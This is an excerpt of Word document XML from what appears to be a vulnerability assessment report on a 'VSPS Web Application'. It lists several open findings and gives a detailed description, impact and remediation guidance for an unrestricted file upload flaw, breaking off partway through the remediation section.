              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="311EE8E7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</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9D9BE43" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5.3</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164C9BD"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29C1062" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="767A8449"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BF02234" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>26</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65CF5A0" w14:textId="0FF5B79A"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020</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47DD48" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerable Component: jQuery UI Cross-Si...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="443" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D97706"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B00EB0C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</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4607AB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.1</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2A122EE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A06:2021-Vulnerable an...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AC5EF4F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="41F096EE"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531D583" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>27</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3D8D921" w14:textId="3EC80541"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019</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10EBF52" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Use of Vulnerable Component: jQuery UI 1...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="443" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D97706"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DCEA235" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</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B317091" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.1</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2B8560C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A06:2021-Vulnerable an...</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C9EF5D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="02900C6B"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5DB01A0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>28</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DDA36CE" w14:textId="79E1E257"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-016</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7757B51" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP TRACE/TRACK Method Enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="443" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D97706"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31089D48" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</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286983E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5.3</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08B4821"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5B1060" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="21C37115"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B391AAB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>29</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8C0FC00" w14:textId="65C6C6F6"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-011</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E90495D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Missing Secure Flag for Cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="443" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D97706"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="305B6BEC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</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E480F61" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5.4</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D82E37D"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15E17CA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="61A636EF" w14:textId="77777777" w:rsidTr="00877518">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496"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1D5FE28" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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98421F7" w14:textId="42ACFB7C" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>VSPS</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>-014</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1997"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D17EDFB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cacheable HTTPS Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="443" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="16A34A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A116337" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="341"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8181530" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="16A34A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675"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EF1B4F9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A05:2021-Security Misc...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="399"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9B86276" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40966882" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65341C77" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B34E7E3"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452B25A0"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57B09D18" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Unrestricted Upload of File with Dangerous Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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2D879350" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>CRITICAL CVSS 10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="234F427E"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061791E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2B6ADAC"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531676B" w14:textId="7C12D77C"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029</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35935BB"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06F3A2C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.0 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1D7315C2"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1456F03"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FC097FC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A08:2021-Software and Data Integrity Failures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A938CD7"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98EFC55" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-434</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1269E26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31674E3"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F8F1841"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FA2761D"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69A2427" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="6E26F16E"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31F7B8A"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9D302BF"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F1D3A45"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F515496" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="4B56344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708FB60"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EA079CD"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6D84D7"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D8DFE00" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45210979" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7533D6" w14:textId="64945E3B" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application is vulnerable to unrestricted upload of files with dangerous types due to insufficient validation of user-supplied file extensions and MIME types. The application allows users to upload files without properly verifying that the file type is safe and intended for the system's functionality. This flaw occurs because the server-side logic either entirely trusts the client-side validation, relies on easily spoofed HTTP Content-Type headers, or uses an insecure blacklist approach for file extensions, which can be bypassed. An attacker can leverage this vulnerability to upload executable content, such as web shells (e.g., .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> files), into the web server's accessible directories. Once an executable file is uploaded, the attacker can then request this file via a web browser, causing the server to execute the malicious code. This provides the attacker with remote code execution capabilities, allowing them to compromise the server, access sensitive data, modify system configurations, or launch further attacks within the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E525A27" w14:textId="2625452B" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685979F5" w14:textId="5083CEAF" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This vulnerability poses a critical risk to the organization's operations, data integrity, and reputation. An attacker exploiting this flaw can gain complete control over the affected </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application server. This could lead to a catastrophic data breach, exposing sensitive government data, customer information, or proprietary intellectual property, resulting in significant financial losses from incident response, forensic investigations, and potential lawsuits. Furthermore, the compromise directly violates NIST CSF compliance requirements, leading to severe regulatory penalties and fines, potentially reaching millions of dollars. The loss of control over the application can disrupt critical government services, causing operational downtime and erosion of public trust. The organization's reputation would suffer immensely, impacting stakeholder confidence and potentially leading to long-term damage to its brand and mission effectiveness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA8AC81" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EEBE69" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020B8B0E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Implement a robust, centralized file upload handling service that enforces a strict whitelist policy for file types and extensions. This service should be isolated and potentially sandboxed to minimize the impact of any bypasses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE24173" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Adopt a content delivery strategy that stores user-uploaded files outside the web root or in a dedicated storage solution (e.g., cloud storage, Network Attached Storage) that prevents direct execution by the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F59671" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- Integrate an enterprise-grade antivirus or malicious content scanning solution into the file upload workflow to detect and block known threats immediately after upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699970B3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E856269" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX (Code Implementation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1D38C1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
